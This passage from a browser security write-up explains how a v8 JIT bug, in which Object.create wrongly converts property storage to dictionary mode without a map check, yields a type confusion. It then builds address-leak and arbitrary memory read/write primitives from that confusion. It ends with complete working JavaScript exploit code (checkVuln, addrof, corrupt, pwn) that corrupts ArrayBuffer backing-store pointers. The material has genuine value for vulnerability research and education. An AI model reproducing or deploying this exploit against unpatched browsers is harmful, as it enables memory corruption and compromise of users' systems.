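Afterwards, the returned array is searched for a match. In case the exploit gets unlucky and doesn't find a matching pair (because all properties happen to be stored at the end of the NameDictionary's inline buffer), it is able to detect that and can simply retry with a different number of properties or different property names.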
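The search for an overlapping pair can be simulated outside the engine. Everything in the following sketch is an assumption made for illustration: the header sizes, the seeded toy hash, and the helper names do not match v8's real PropertyArray or NameDictionary. Only the idea carries over: store distinctive negative values, read the dictionary at array offsets, and see whose value comes back.

```javascript
// Hypothetical layouts (in words), not v8's real ones.
const ARRAY_HEADER = 2;   // [map, length]
const DICT_HEADER = 7;    // made-up number of dictionary header words

function toPropertyArray(values) {
    return ['<map>', values.length, ...values];
}

// (name, value, flags) triples placed by a seeded toy hash with linear probing.
function toNameDictionary(values, seed) {
    const capacity = values.length * 2;
    const buckets = new Array(capacity).fill(null);
    values.forEach((value, i) => {
        let b = (i * 7 + seed) % capacity;
        while (buckets[b] !== null) b = (b + 1) % capacity;
        buckets[b] = [`p${i}`, value, 0];
    });
    const words = new Array(DICT_HEADER).fill(0);
    for (const entry of buckets) {
        words.push(...(entry ?? ['<hole>', '<hole>', 0]));
    }
    return words;
}

// Returns [i, j] if a stale array-style load of p_i reads the value of p_j.
function findOverlap(numProperties, seed) {
    // Negative markers cannot be mistaken for header or flag words.
    const values = Array.from({ length: numProperties }, (_, i) => -(i + 1));
    const array = toPropertyArray(values);
    const dict = toNameDictionary(values, seed);
    for (let i = 0; i < numProperties; i++) {
        const expected = array[ARRAY_HEADER + i];
        const stale = dict[ARRAY_HEADER + i];
        if (typeof stale === 'number' && stale < 0 && stale !== expected) {
            return [i, -stale - 1];
        }
    }
    return null;   // unlucky layout: retry with other parameters
}
```

In this model, findOverlap returns null when no property value lands within the range of array offsets, which corresponds to the retry case described above.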

4.1 - Constructing Type Confusions

There is an important bit about v8 that wasn't discussed yet. Besides the location of property values, Maps also store type information for properties. Consider the following piece of code:

    let o = {}
    o.a = 1337;
    o.b = {x: 42};

After executing it in v8, the Map of o will indicate that the property .a will always be a Smi while property .b will be an Object with a certain Map that will in turn have a property .x of type Smi. In that case, compiling a function such as

    function foo(o) {
        return o.b.x;
    }

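will result in a single Map check for o but no further Map check for the .b property, since it is known that .b will always be an Object with a specific Map. If the type information for a property is ever invalidated by assigning a property value of a different type, a new Map is allocated and the type information for that property is widened to include both the previous and the new type.

With that, it becomes possible to construct a powerful exploit primitive from the bug at hand: by finding a matching pair of properties, JIT code can be compiled which assumes it will load property p1 of one type but in reality ends up loading property p2 of a different type. Due to the type information stored in the Map, the compiler will, however, omit type checks for the property value, thus yielding a kind of universal type confusion: a primitive that allows one to confuse an object of type X with an object of type Y, where both X and Y, as well as the operation that will be performed on type X in the JIT code, can be arbitrarily chosen. This is, unsurprisingly, a very powerful primitive.

Below is the scaffold code for crafting such a type confusion primitive from the bug at hand. Here p1 and p2 are the property names of the two properties that overlap after the property storage is converted to dictionary mode. As they are not known in advance, the exploit relies on eval to generate the correct code at runtime.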

    eval(`
        function vuln(o) {
            // Force a CheckMaps node
            let a = o.inline;
            // Trigger unexpected transition of property storage
            this.Object.create(o);
            // Seemingly load .p1 but really load .p2
            let p = o.${p1};
            // Use p (known to be of type X but really is of type Y)
            // ...;
        }
    `);

    let arg = makeObj();
    arg[p1] = objX;
    arg[p2] = objY;
    vuln(arg);

In the JIT compiled function, the compiler will then know that the local variable p will be of type X due to the Map of o and will thus omit type checks for it. However, due to the vulnerability, the runtime code will actually receive an object of type Y, causing a type confusion.

4.2 - Gaining Memory Read/Write

From here, additional exploit primitives will now be constructed: first a primitive to leak the addresses of JavaScript objects, second a primitive to overwrite arbitrary fields in an object. The address leak is possible by confusing the two objects in a compiled piece of code which fetches the .x property, an unboxed double, converts it to a v8 HeapNumber, and returns that to the caller. Due to the vulnerability, it will, however, actually load a pointer to an object and return that as a double.

    function vuln(o) {
        let a = o.inline;
        this.Object.create(o);
        return o.${p1}.x;
    }

    let arg = makeObj();
    arg[p1] = {x: 13.37};       // X, inline property is an unboxed double
    arg[p2] = {y: obj};         // Y, inline property is a pointer
    vuln(arg);

This code will result in the address of obj being returned to the caller as a double, such as 1.9381218278403e-310. Next, the corruption. As is often the case, the "write" primitive is just the inversion of the "read" primitive. In this case, it suffices to write to a property that is expected to be an unboxed double, such as shown next.


    function vuln(o) {
        let a = o.inline;
        this.Object.create(o);
        let orig = o.${p1}.x;
        o.${p1}.x = ${newValue};
        return orig;
    }

This will "corrupt" property .y of the second object with a controlled double. However, to achieve something useful, the exploit would likely need to corrupt an internal field of an object, such as is done below for an ArrayBuffer. Note that the second primitive will read the old value of the property and return that to the caller. This makes it possible to:

* immediately detect once the vulnerable code ran for the first time
      and corrupted the victim object

* fully restore the corrupted object at a later point to guarantee
      clean process continuation.
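Both primitives pass raw 64-bit values through JavaScript doubles: the leak returns an address as a double, and the write takes its new value as one. A minimal sketch of that reinterpretation is shown below, using a DataView over a scratch buffer; the helper names are chosen for this example, and the exploit code at the end of the article achieves the same with typed array views.

```javascript
// One 8-byte scratch buffer, viewed both as a double and as a 64-bit integer.
const scratch = new DataView(new ArrayBuffer(8));

// Reinterpret the bits of a double as an unsigned 64-bit integer.
function doubleToBits(d) {
    scratch.setFloat64(0, d);
    return scratch.getBigUint64(0);
}

// Reinterpret an unsigned 64-bit integer as a double.
function bitsToDouble(bits) {
    scratch.setBigUint64(0, bits);
    return scratch.getFloat64(0);
}

// A tagged pointer such as 0x23ad7c58e0e9 becomes a tiny subnormal double.
const exampleLeak = bitsToDouble(0x23ad7c58e0e9n);
```

User-space pointers have their upper 16 bits clear, so they map to very small positive doubles and survive the round trip unchanged.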

With those primitives at hand, gaining arbitrary memory read/write becomes as easy as

    0. Creating two ArrayBuffers, ab1 and ab2

    1. Leaking the address of ab2

    2. Corrupting the backingStore pointer of ab1 to point to ab2
    
    
    
    +-----------------+           +-----------------+
    |  ArrayBuffer 1  |     +---->|  ArrayBuffer 2  |
    |                 |     |     |                 |
    |  map            |     |     |  map            |
    |  properties     |     |     |  properties     |
    |  elements       |     |     |  elements       |
    |  byteLength     |     |     |  byteLength     |
    |  backingStore --+-----+     |  backingStore   |
    |  flags          |           |  flags          |
    +-----------------+           +-----------------+

Afterwards, arbitrary addresses can be accessed by overwriting the backingStore pointer of ab2 by writing into ab1 and subsequently reading from or writing to ab2.
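The two-ArrayBuffer construction can be simulated with a flat toy memory. In this sketch the address space is a single DataView, BACKING_STORE_OFFSET is a made-up field offset, and makeToyArrayBuffer is a hypothetical helper; the point is only to show how retargeting ab2 through ab1 yields read and write access to any address.

```javascript
// Toy flat memory: "addresses" are byte offsets into this buffer.
const memory = new DataView(new ArrayBuffer(0x1000));
const BACKING_STORE_OFFSET = 0x20;   // hypothetical header field offset

// A toy ArrayBuffer whose accesses always go through the backingStore
// pointer currently stored in its header, like the engine would.
function makeToyArrayBuffer(headerAddr, storeAddr) {
    memory.setBigUint64(headerAddr + BACKING_STORE_OFFSET, BigInt(storeAddr), true);
    const base = () =>
        Number(memory.getBigUint64(headerAddr + BACKING_STORE_OFFSET, true));
    return {
        headerAddr,
        read64: (offset) => memory.getBigUint64(base() + offset, true),
        write64: (offset, value) =>
            memory.setBigUint64(base() + offset, value, true),
    };
}

// Step 0: two buffers with ordinary backing stores.
const ab1 = makeToyArrayBuffer(0x100, 0x400);
const ab2 = makeToyArrayBuffer(0x200, 0x500);

// Steps 1 and 2: the leak and write primitives would be used here to point
// ab1's backingStore at ab2's header. The toy writes it directly instead.
memory.setBigUint64(ab1.headerAddr + BACKING_STORE_OFFSET,
                    BigInt(ab2.headerAddr), true);

// Arbitrary access: retarget ab2 through ab1, then use ab2.
function read64(addr) {
    ab1.write64(BACKING_STORE_OFFSET, BigInt(addr));
    return ab2.read64(0);
}
function write64(addr, value) {
    ab1.write64(BACKING_STORE_OFFSET, BigInt(addr));
    ab2.write64(0, value);
}
```

After the one-time corruption of ab1, no further use of the vulnerability is needed: every later access only touches ordinary buffer contents.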

4.3 - Reflections

As was demonstrated, by abusing the type inference system in v8, an initially limited type confusion primitive can be extended to achieve confusion of arbitrary objects in JIT code. This primitive is powerful for several reasons:

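0. The user is able to create custom types, e.g. by adding properties to objects. This avoids the need to find a good type confusion candidate, as one can simply create it, as was done by the presented exploit when it confused an ArrayBuffer with an object with inline properties to corrupt the backingStore pointer.
1. Code can be JIT compiled that performs an arbitrary operation on an object of type X but at runtime receives an object of type Y due to the vulnerability. The presented exploit compiles loads and stores of unboxed double properties to achieve address leaks and the corruption of ArrayBuffers respectively.
2. Type information is aggressively tracked by the engine, which increases the number of types that can be confused with each other.

As such, it can be worthwhile to first construct the discussed primitive from lower-level primitives if these aren't sufficient to achieve reliable memory read/write. It is likely that most type check elimination bugs can be turned into this primitive. Further, other types of vulnerabilities can potentially be exploited to yield it as well. Possible examples include register allocation bugs, use-after-frees, or out-of-bounds reads or writes into the property buffers of JavaScript objects.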

4.4 - Gaining Code Execution

While previously an attacker could simply write shellcode into the JIT region and execute it, things have become slightly more time consuming: in early 2018, v8 introduced a feature called write-protect-code-memory [20] which essentially flips the JIT region's access permissions between R-X and RW-. With that, the JIT region will be mapped as R-X during execution of JavaScript code, thus preventing an attacker from directly writing into it. As such, one now needs to find another way to code execution, such as simply performing ROP by overwriting vtables, JIT function pointers, the stack, or through another method of one's choosing. This is left as an exercise for the reader. Afterwards, the only thing left to do is to run a sandbox escape... ;)

5 - References


[1] https://blogs.securiteam.com/index.php/archives/3783
[2] https://cs.chromium.org/
[3] https://v8.dev/
[4] https://www.ecma-international.org/ecma-262/8.0/index.html#sec-array-exotic-objects
[5] https://www.ecma-international.org/ecma-262/8.0/index.html#sec-addition-operator-plus
[6] https://chromium.googlesource.com/v8/v8.git/+/6.9.427.19/tools/turbolizer/
[7] https://v8.dev/docs/ignition
[8] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache
[9] https://mathiasbynens.be/notes/shapes-ics
[10] https://bugs.chromium.org/p/project-zero/issues/detail?id=1380
[11] https://github.com/WebKit/webkit/commit/61dbb71d92f6a9e5a72c5f784eb5ed11495b3ff7
[12] https://bugzilla.mozilla.org/show_bug.cgi?id=1145255
[13] https://www.thezdi.com/blog/2017/8/24/deconstructing-a-winning-webkit-pwn2own-entry
[14] https://bugs.chromium.org/p/chromium/issues/detail?id=762874
[15] https://bugs.chromium.org/p/project-zero/issues/detail?id=1390
[16] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/browser-security-beyond-sandboxing/
[17] https://bugs.chromium.org/p/project-zero/issues/detail?id=1396
[18] https://www.mozilla.org/en-US/security/advisories/mfsa2018-24/#CVE-2018-12386
[19] https://mathiasbynens.be/notes/prototypes
[20] https://github.com/v8/v8/commit/14917b6531596d33590edb109ec14f6ca9b95536

6 - Exploit Code



if (typeof(window) !== 'undefined') {
    print = function(msg) {
        console.log(msg);
        document.body.textContent += msg + "\r\n";
    }
}

{
    // Conversion buffers.
    let floatView = new Float64Array(1);
    let uint64View = new BigUint64Array(floatView.buffer);
    let uint8View = new Uint8Array(floatView.buffer);

    // Feature request: unboxed BigInt properties so these aren't needed =)
    Number.prototype.toBigInt = function toBigInt() {
        floatView[0] = this;
        return uint64View[0];
    };

    BigInt.prototype.toNumber = function toNumber() {
        uint64View[0] = this;
        return floatView[0];
    };
}

// Garbage collection is required to move objects to a stable position in
// memory (OldSpace) before leaking their addresses.
function gc() {
    for (let i = 0; i < 100; i++) {
        new ArrayBuffer(0x100000);
    }
}

const NUM_PROPERTIES = 32;
const MAX_ITERATIONS = 100000;

function checkVuln() {
    function hax(o) {
        // Force a CheckMaps node before the property access. This must
        // load an inline property here so the out-of-line properties
        // pointer cannot be reused later.
        o.inline;

        // Turbofan assumes that the JSCreateObject operation is
        // side-effect free (it has the kNoWrite property). However, if the
        // prototype object (o in this case) is not a constant, then
        // JSCreateObject will be lowered to a runtime call to
        // CreateObjectWithoutProperties. This in turn eventually calls
        // JSObject::OptimizeAsPrototype which will modify the prototype
        // object and assign it a new Map. In particular, it will
        // transition the OOL property storage to dictionary mode.
        Object.create(o);

        // The CheckMaps node for this property access will be incorrectly
        // removed. The JIT code is now accessing a NameDictionary but
        // believes it's loading from a FixedArray.
        return o.outOfLine;
    }

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let o = {inline: 0x1337};
        o.outOfLine = 0x1338;
        let r = hax(o);
        if (r !== 0x1338) {
            return;
        }
    }

    throw "Not vulnerable";
}

// Make an object with one inline and numerous out-of-line properties.
function makeObj(propertyValues) {
    let o = {inline: 0x1337};
    for (let i = 0; i < NUM_PROPERTIES; i++) {
        Object.defineProperty(o, 'p' + i, {
            writable: true,
            value: propertyValues[i]
        });
    }
    return o;
}

//
// The 3 exploit primitives.
//

// Find a pair (p1, p2) of properties such that p1 is stored at the same
// offset in the FixedArray as p2 is in the NameDictionary.
let p1, p2;
function findOverlappingProperties() {
    let propertyNames = [];
    for (let i = 0; i < NUM_PROPERTIES; i++) {
        propertyNames[i] = 'p' + i;
    }
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\n')}
            return [${propertyNames.join(', ')}];
        }
    `);

    let propertyValues = [];
    for (let i = 1; i < NUM_PROPERTIES; i++) {
        // There are some unrelated, small-valued SMIs in the dictionary.
        // However they are all positive, so use negative SMIs. Don't use
        // -0 though, that would be represented as a double...
        propertyValues[i] = -i;
    }

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let r = hax(makeObj(propertyValues));
        for (let j = 1; j < r.length; j++) {
            // Properties that overlap with themselves cannot be used.
            if (j !== -r[j] && r[j] < 0 && r[j] > -NUM_PROPERTIES) {
                [p1, p2] = [j, -r[j]];
                return;
            }
        }
    }

    throw "Failed to find overlapping properties";
}

// Return the address of the given object as BigInt.
function addrof(obj) {
    // Confuse an object with an unboxed double property with an object
    // with a pointer property.
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            return o.p${p1}.x1;
        }
    `);

    let propertyValues = [];
    // For simplicity, property p1 uses an object with the same Map as
    // the one used in corrupt().
    propertyValues[p1] = {x1: 13.37, x2: 13.38};
    propertyValues[p2] = {y1: obj};

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let res = hax(makeObj(propertyValues));
        if (res !== 13.37) {
            // Adjust for the LSB being set due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }

    throw "Addrof failed";
}

// Corrupt the backingStore pointer of an ArrayBuffer object and return the
// original address so the ArrayBuffer can later be repaired.
function corrupt(victim, newValue) {
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            let orig = o.p${p1}.x2;
            o.p${p1}.x2 = ${newValue.toNumber()};
            return orig;
        }
    `);

    let propertyValues = [];
    // x2 overlaps with the backingStore pointer of the ArrayBuffer.
    let o = {x1: 13.37, x2: 13.38};
    propertyValues[p1] = o;
    propertyValues[p2] = victim;

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        o.x2 = 13.38;
        let r = hax(makeObj(propertyValues));
        if (r !== 13.38) {
            return r.toBigInt();
        }
    }

    throw "CorruptArrayBuffer failed";
}

function pwn() {
    //
    // Step 0. verify that the engine is vulnerable.
    //
    checkVuln();
    print("[+] v8 version is vulnerable");

    //
    // Step 1. determine a pair of overlapping properties.
    //
    findOverlappingProperties();
    print(`[+] Properties p${p1} and p${p2} overlap`);

    //
    // Step 2. leak the address of an ArrayBuffer.
    //
    let memViewBuf = new ArrayBuffer(1024);
    let driverBuf = new ArrayBuffer(1024);

    // Move ArrayBuffer into old space before leaking its address.
    gc();

    let memViewBufAddr = addrof(memViewBuf);
    print(`[+] ArrayBuffer @ 0x${memViewBufAddr.toString(16)}`);

    //
    // Step 3. corrupt the backingStore pointer of another ArrayBuffer to
    // point to the first ArrayBuffer.
    //
    let origDriverBackingStorage = corrupt(driverBuf, memViewBufAddr);

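    // driverBuf's backing store now points at the memViewBuf object itself,
    // so driver[4] (byte offset 32) aliases memViewBuf's backingStore pointer.
    let driver = new BigUint64Array(driverBuf);
    let origMemViewBackingStorage = driver[4];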

    //
    // Step 4. construct the memory read/write primitives.
    //
    let memory = {
        write(addr, bytes) {
            driver[4] = addr;
            let memview = new Uint8Array(memViewBuf);
            memview.set(bytes);
        },
        read(addr, len) {
            driver[4] = addr;
            let memview = new Uint8Array(memViewBuf);
            return memview.subarray(0, len);
        },
        read64(addr) {
            driver[4] = addr;
            let memview = new BigUint64Array(memViewBuf);
            return memview[0];
        },
        write64(addr, ptr) {
            driver[4] = addr;
            let memview = new BigUint64Array(memViewBuf);
            memview[0] = ptr;
        },
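        addrof(obj) {
            // Store obj in the out-of-line property storage of memViewBuf.
            memViewBuf.leakMe = obj;
            // Offset 8 holds the tagged pointer to that property storage.
            let props = this.read64(memViewBufAddr + 8n);
            // Skip the 16-byte header of the storage array (15n because
            // props is tagged), then untag the leaked pointer.
            return this.read64(props + 15n) - 1n;
        },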
        fixup() {
            let driverBufAddr = this.addrof(driverBuf);
            this.write64(driverBufAddr + 32n, origDriverBackingStorage);
            this.write64(memViewBufAddr + 32n, origMemViewBackingStorage);
        },
    };

    print("[+] Constructed memory read/write primitive");

    // Read from and write to arbitrary addresses now :)
    memory.write64(0x41414141n, 0x42424242n);

    // All done here, repair the corrupted objects.
    memory.fixup();

    // Verify everything is stable.
    gc();
}

if (typeof(window) === 'undefined')
    pwn();
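
The exploit depends on reinterpreting the bits of a double as a 64-bit integer and back, and on removing the HeapObject tag bit from leaked pointers. The following is a minimal standalone sketch of that conversion, assuming an engine with BigInt and BigUint64Array support. The names floatToBits, bitsToFloat and untag are hypothetical and not part of the exploit above, which installs the equivalent helpers on Number.prototype and BigInt.prototype instead. The pointer value in the last line is made up for illustration.

```javascript
// Both views share one 8-byte buffer, so a value written through one
// view can be read back through the other with its bits unchanged.
const scratch = new ArrayBuffer(8);
const f64 = new Float64Array(scratch);
const u64 = new BigUint64Array(scratch);

// Reinterpret the bits of a double as an unsigned 64-bit BigInt.
function floatToBits(value) {
    f64[0] = value;
    return u64[0];
}

// Reinterpret an unsigned 64-bit BigInt as a double.
function bitsToFloat(bits) {
    u64[0] = bits;
    return f64[0];
}

// Remove the HeapObject tag (least significant bit set to 1) from a
// tagged pointer, as done with "- 1n" in addrof above.
function untag(taggedPointer) {
    return taggedPointer - 1n;
}

console.log('0x' + floatToBits(1.0).toString(16)); // 0x3ff0000000000000
console.log(bitsToFloat(0x4000000000000000n));     // 2
console.log('0x' + untag(0x1231n).toString(16));   // 0x1230 (made-up pointer)
```

Standalone functions avoid modifying built-in prototypes, at the cost of a slightly more verbose call site than res.toBigInt().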